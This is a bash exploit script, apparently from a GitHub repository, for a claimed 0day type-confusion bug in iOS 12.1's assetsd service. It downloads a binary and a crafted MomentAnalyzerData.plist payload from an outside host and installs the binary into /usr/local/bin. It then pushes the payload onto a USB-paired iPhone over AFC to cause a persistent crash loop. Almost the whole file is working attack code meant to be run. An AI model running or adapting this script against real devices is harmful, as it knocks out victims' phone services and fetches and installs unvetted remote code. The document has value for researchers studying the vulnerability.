-
Notifications
You must be signed in to change notification settings - Fork 12
/
assetsd_09_2018.sh
executable file
·76 lines (64 loc) · 3.13 KB
/
assetsd_09_2018.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#!/usr/bin/env bash
### assetsd iOS 12.1 type confusion vulnerability / persistant DoS
### Created by Sem Voigtländer on 09/25/2018.
### Licensed under the MIT License
### This is a 0day at this time
### DESCRIPTION
###
### Assetsd, MediaAnalyzer, MobileSlideshow all use metadata information.
### This metadata is stored in propertylists in /var/mobile/Media which is a path accessible through the AFC protocol over USB.
### An attacker can thus modify this file and reupload it to the victims device, but a requirement is to have a paired device
### Unlike the iBooks vulnerability this vulnerability does not require userinteraction
### It is perfectly exploitable for race conditions as the assetsd service is restarted automatically upon crash and the bug will occur again
### I modified the type of the location key-values in the MomentAnalyzerData propertylist, but this is certainly not the only way to exploit it.
# CONSOLE INIT
clear
echo "==== Assetsd Type Confusion - iOS <= 12.1 ===="
echo "= Created by: Sem Voigtlander ===="
echo "=============================================="
echo " "
echo "Please connect your iPhone and wait a few..."
sleep 10
# INITIAL SETUP
echo "Creating exploit tmp directory..."
mkdir -p "/tmp/assetsd_09_2018"
# Check whether afcclient is installed, otherwise download and install it
if ! [ -x "$(command -v afcclient)" ]; then
echo "Downloading requirements..."
curl "http://exploitation.cool/plataoplomo/exploits/data/afcclient_linux.bin" > "/tmp/assetsd_09_2018/afcclient.bin"
base64 -D -i "/tmp/assetsd_09_2018/afcclient.bin" -o "/tmp/assetsd_09_2018/afcclient"
rm "/tmp/assetsd_09_2018/afcclient.bin"
chmod +x "/tmp/assetsd_09_2018/afcclient"
mv "/tmp/assetsd_09_2018/afcclient" "/usr/local/bin/afcclient"
fi
# WORKSPACE SETUP
echo "Setting up exploit workspace"
cd "/tmp/assetsd_09_2018"
METADATA_DIR="PhotoData"
VULNERABLE_FILE="MISC/MomentAnalyzerData.plist"
# ARGUMENT HANDLING
if [[ "$1" == "fix" ]]; then
afcclient rm "$METADATA_DIR/$VULNERABLE_FILE"
exit;
fi
# PAYLOAD CREATION
echo "Creating payload..."
PAYLOAD="$(curl http://exploitation.cool/plataoplomo/exploits/data/MomentAnalyzerData.plist)";
echo -e "$PAYLOAD" > "MomentAnalyzerData.plist"
# IPHONE BACKUP
echo "Backing up..."
afcclient get "$METADATA_DIR/$VULNERABLE_FILE" "Backup.dat"
# EXPLOITATION
echo "Uploading exploit..."
afcclient rm "$METADATA_DIR/$VULNERABLE_FILE"
afcclient put "MomentAnalyzerData.plist" "$METADATA_DIR/$VULNERABLE_FILE"
rm "MomentAnalyzerData.plist"
# POST_EXPLOITATION
if [ -x "$(command -v idevicesyslog)" ]; then
echo -e "We will start the systemlog now, the bug should appear there as a crash including registers, but this may take some time!\n"
idevicesyslog | grep "/System/Library/Frameworks/AssetsLibrary.framework/Support/assetsd" -A 185
echo "You can restart your device and run idevicesyslog to verify it is persistant, or take a look at the Settings>Privacy>Analytics on the device"
echo "To fix assetsd simply run this with the following argument: fix"
else
echo "Done. You can verify the occasion of the bug in Settings>Privacy>Analytics on the device (look for assetsd)"
fi